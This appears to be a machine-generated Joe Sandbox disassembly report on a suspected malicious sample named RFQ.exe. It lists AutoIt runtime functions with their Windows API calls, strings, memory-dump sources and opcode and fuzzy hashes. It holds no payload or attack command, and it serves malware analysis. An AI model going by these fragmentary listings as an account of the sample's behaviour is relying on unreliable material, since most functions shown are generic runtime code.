                                                                            • Instruction ID: fc3b74797c97c6476353bea5343ba91dc56b6405b946362e793b4bb6f26df8dd
                                                                            • Opcode Fuzzy Hash: 91ad7a0a84b02429a5f59cf53350fa501c72ca12bf8d952331a0c7e26530a59b
                                                                            • Instruction Fuzzy Hash: 3E413C72901219AFDF11DFA5CD85AEEBBB9EF09700F004099FA45B7281DA706E45CB64
                                                                            Function 006B16BE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ.exe,00000104), ref: 006B16F9
                                                                            • _free.LIBCMT ref: 006B17C4
                                                                            • _free.LIBCMT ref: 006B17CE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$FileModuleName
                                                                            • String ID: C:\Users\user\Desktop\RFQ.exe
                                                                            • API String ID: 2506810119-1200040333
                                                                            • Opcode ID: 1da28ce76e0b3a44472481b0a38710180f289971d6ea8cabadcd7dcb121bf8c1
                                                                            • Instruction ID: a58f909259d0a195faa3a45d7fb71083f2cc19ae0ae3c6e4065dfff8e48e0175
                                                                            • Opcode Fuzzy Hash: 1da28ce76e0b3a44472481b0a38710180f289971d6ea8cabadcd7dcb121bf8c1
                                                                            • Instruction Fuzzy Hash: 4F3193B1A40218BBCB21DB99CC95DDEBBFDEB86311F50416AE404DB210DAB08E81CB94
                                                                            Function 006EC19B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006EC224
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 006EC26A
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00751990,01355870), ref: 006EC2B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem
                                                                            • String ID: 0
                                                                            • API String ID: 135850232-4108050209
                                                                            • Opcode ID: dbb4d091c247ce32fdf601d69935af1ff892962de5bdfe8fd4965af55068b038
                                                                            • Instruction ID: cf4720e9c4063d98b1301c8717268f4ffcf3ef5ab9a7904b3da2ef88d7be3875
                                                                            • Opcode Fuzzy Hash: dbb4d091c247ce32fdf601d69935af1ff892962de5bdfe8fd4965af55068b038
                                                                            • Instruction Fuzzy Hash: 7D41E330105381DFD720DF65C840B9ABBEAAF89324F14451DF961973D1C730EA06CB6A
                                                                            Function 0071434B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0071D0D0,00000000,?,?,?,?), ref: 007143DF
                                                                            • GetWindowLongW.USER32 ref: 007143FC
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0071440C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: a412d95a7bbf291d60d59997244846d81d68c16202ba0be1c55e73806a15d065
                                                                            • Instruction ID: 9894d43c8016b66a1ec94875f73852a944d3de5f32e05c66dc4b42407ff2f4a0
                                                                            • Opcode Fuzzy Hash: a412d95a7bbf291d60d59997244846d81d68c16202ba0be1c55e73806a15d065
                                                                            • Instruction Fuzzy Hash: C131B072100205ABDF219F78CC45BEA7BA9EB09334F248724F979E21E1C738EC958B54
                                                                            Function 00702F75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00703282: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00702F9E,?,?), ref: 0070329F
                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00702FA1
                                                                            • _wcslen.LIBCMT ref: 00702FC2
                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 0070302D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 946324512-2422070025
                                                                            • Opcode ID: 4949145e3b181183a4476e27091fa54548bc9afaa5149eaf31f789a4f93d8ed9
                                                                            • Instruction ID: 21b21397c23487c194719f0320e823459f29ae9e968fd7800bc33a1f5637734b
                                                                            • Opcode Fuzzy Hash: 4949145e3b181183a4476e27091fa54548bc9afaa5149eaf31f789a4f93d8ed9
                                                                            • Instruction Fuzzy Hash: 0131C135601201DFCB20DF68C585E6A7BE6AF15358F248299E8168F3D2D779EE42CB60
                                                                            Function 00714588 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0071463A
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00714648
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0071464F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: 3d1c99fc14a4229bad4acfe8ec4265182a4ef75ce8514ed98d7abc177d7f0bdb
                                                                            • Instruction ID: 5575fe64d58eef3f45cf7e9118f77484c507cd74de88e79cb54ff03452ef1bd6
                                                                            • Opcode Fuzzy Hash: 3d1c99fc14a4229bad4acfe8ec4265182a4ef75ce8514ed98d7abc177d7f0bdb
                                                                            • Instruction Fuzzy Hash: B121AFB5600208AFDB10DF68CC91DF737ADEF4A3A8B040049FA009B291CB75EC51CB60
                                                                            Function 006E94CB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 176396367-2734436370
                                                                            • Opcode ID: aa8a6fa00b85f5be5bacb413464e77dbcf53b601f7880ecb19da2ea4e1fd8710
                                                                            • Instruction ID: d0651b675e3b161a2a1712e90472899169dab9a19016f698624dcd1fc629bf43
                                                                            • Opcode Fuzzy Hash: aa8a6fa00b85f5be5bacb413464e77dbcf53b601f7880ecb19da2ea4e1fd8710
                                                                            • Instruction Fuzzy Hash: 4E212972106391A6C732F6269C12FEB73DB9F92310F548029F9458B5C1EB65AD82C3B9
                                                                            Function 007136EA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00713773
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00713783
                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007137A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: 0e5329ad3b081b94e0d7fea12aecbb61b2d723ac1b73e1e056c18ba1adec2171
                                                                            • Instruction ID: 1f6cc8b2ca0faba963197e16a65a7a7847c7d9799bb395dc3b3936d59061a997
                                                                            • Opcode Fuzzy Hash: 0e5329ad3b081b94e0d7fea12aecbb61b2d723ac1b73e1e056c18ba1adec2171
                                                                            • Instruction Fuzzy Hash: C421A4B2610218BBEF118F68DC85EFB376EEF89760F108114F9549B1D0C679ED9187A0
                                                                            Function 006F4912 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006F4926
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006F497A
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,0071D0D0), ref: 006F49EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume
                                                                            • String ID: %lu
                                                                            • API String ID: 2507767853-685833217
                                                                            • Opcode ID: 267fb0f9a1fa5c8a5bb2927372674f244da94dcddc44ddf793d8545d1119ab26
                                                                            • Instruction ID: 783941ccffa0e793bf1e58136995ffd63b1e5f99089d025acc587c62f34517bf
                                                                            • Opcode Fuzzy Hash: 267fb0f9a1fa5c8a5bb2927372674f244da94dcddc44ddf793d8545d1119ab26
                                                                            • Instruction Fuzzy Hash: 72316F74A00109AFDB50DF94C885EAA7BF9EF08308F148099F909DB392DB75EE45CB61
                                                                            Function 00714120 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00714184
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00714199
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007141A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: 68d6c3a98a91addfb5065938af92463002f7c09bff05bde5f9f643a92b33e978
                                                                            • Instruction ID: bc655a3eb2036ec2484f7a7d75f5b3a17052daa30af2090e205d01e17c471018
                                                                            • Opcode Fuzzy Hash: 68d6c3a98a91addfb5065938af92463002f7c09bff05bde5f9f643a92b33e978
                                                                            • Instruction Fuzzy Hash: EB11027124020CBEEF205F68CC06FEB3BA8EF95B24F114514FA55E20E0D675EC91AB60
                                                                            Function 006E2E95 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                              • Part of subcall function 006E2CEB: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 006E2D09
                                                                              • Part of subcall function 006E2CEB: GetWindowThreadProcessId.USER32(?,00000000), ref: 006E2D1A
                                                                              • Part of subcall function 006E2CEB: GetCurrentThreadId.KERNEL32 ref: 006E2D21
                                                                              • Part of subcall function 006E2CEB: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 006E2D28
                                                                            • GetFocus.USER32 ref: 006E2EBB
                                                                              • Part of subcall function 006E2D32: GetParent.USER32(00000000), ref: 006E2D3D
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 006E2F06
                                                                            • EnumChildWindows.USER32(?,006E2F7E), ref: 006E2F2E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                            • String ID: %s%d
                                                                            • API String ID: 1272988791-1110647743
                                                                            • Opcode ID: 701497e798b473a1c7e6e14fb17ba0a9f93f7b50166589bc7e10d89f72057676
                                                                            • Instruction ID: dad6d5f9069ff5640782a5b9cb4aa48dcb434e144e1f56c73c10785249a58368
                                                                            • Opcode Fuzzy Hash: 701497e798b473a1c7e6e14fb17ba0a9f93f7b50166589bc7e10d89f72057676
                                                                            • Instruction Fuzzy Hash: DD11D5712403069BCF51BFB5CCD6AFD37AFAF84314F148069F90A97292DE3499458B64
                                                                            Function 007157B7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007157F6
                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00715823
                                                                            • DrawMenuBar.USER32(?), ref: 00715832
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$InfoItem$Draw
                                                                            • String ID: 0
                                                                            • API String ID: 3227129158-4108050209
                                                                            • Opcode ID: 36777450ee8780311aee8e189efd142e3b62bb57778df03a476adc0920bed71d
                                                                            • Instruction ID: a6837595de603d2396ce30d8b4677afb6c39588900a37fe20263a38ef1ed0293
                                                                            • Opcode Fuzzy Hash: 36777450ee8780311aee8e189efd142e3b62bb57778df03a476adc0920bed71d
                                                                            • Instruction Fuzzy Hash: 76018031600218EFDB519F58DC44BEA7BB9FF85350F10C0A9E849D6190DB3889D4EF21
                                                                            Function 006E0A59 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006E0A67
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: AutoIt$Error allocating memory.$un
                                                                            • API String ID: 2030045667-3912188382
                                                                            • Opcode ID: 56baec85e72d698f6e299b7049fdf1277ba8c71fc8d13e06fe4540aff2c64da1
                                                                            • Instruction ID: 0ab63a595f30bb6c923c579989d033399f7a7acabc52fb2141954fc916557838
                                                                            • Opcode Fuzzy Hash: 56baec85e72d698f6e299b7049fdf1277ba8c71fc8d13e06fe4540aff2c64da1
                                                                            • Instruction Fuzzy Hash: AEE0483238535867D75537D8BC43FC97A898F09B11F60442DF748A55C38FD668D0469D
                                                                            Function 00703355 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                                            • String ID:
                                                                            • API String ID: 1998397398-0
                                                                            • Opcode ID: f6a3db825102a61fa19359f741b91c27e2127a5de82d8459b0dee73e7a3aa61b
                                                                            • Instruction ID: 2391d4dae5e91e60de6f10448ad9c22a78ae37b4a8572c7cf98992cf4949f0a7
                                                                            • Opcode Fuzzy Hash: f6a3db825102a61fa19359f741b91c27e2127a5de82d8459b0dee73e7a3aa61b
                                                                            • Instruction Fuzzy Hash: 71A11875604300DFC741EF64C885A2AB7EAEF89710F04865DFA899B3A1CB75ED01CB56
                                                                            Function 006E031F Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0071FC24,?), ref: 006E04D9
                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0071FC24,?), ref: 006E04F1
                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0071D108,000000FF,?,00000000,00000800,00000000,?,0071FC24,?), ref: 006E0516
                                                                            • _memcmp.LIBVCRUNTIME ref: 006E0537
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                            • String ID:
                                                                            • API String ID: 314563124-0
                                                                            • Opcode ID: 27314fa19b4190ca224874f734ea00b88e5b7f17558d56089c07d227436012d1
                                                                            • Instruction ID: f6ba4496e3eb059d4cf46a78dd5af4de835ae1b2d741e630460ccffab0f90d42
                                                                            • Opcode Fuzzy Hash: 27314fa19b4190ca224874f734ea00b88e5b7f17558d56089c07d227436012d1
                                                                            • Instruction Fuzzy Hash: F2811B71A00209EFDB04DF95C984EEEB7BAFF89315F204558E506AB250DB71AE46CF60
                                                                            Function 006C1331 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: 18375251047b29b90978f80421d81fa75bce0dd81c32d460921b8f1c1674d007
                                                                            • Instruction ID: d5a677e296b62a7e982ce53985adb5fbddf89f0907480204ca8346b53a93e68c
                                                                            • Opcode Fuzzy Hash: 18375251047b29b90978f80421d81fa75bce0dd81c32d460921b8f1c1674d007
                                                                            • Instruction Fuzzy Hash: 3D412771640650AADB687BF98C45FFE3AE7EF43720F14822DF418DA293DA384D4147A6
                                                                            Function 00716146 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(0135E510,?), ref: 007161B0
                                                                            • ScreenToClient.USER32(?,?), ref: 007161E3
                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00716250
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
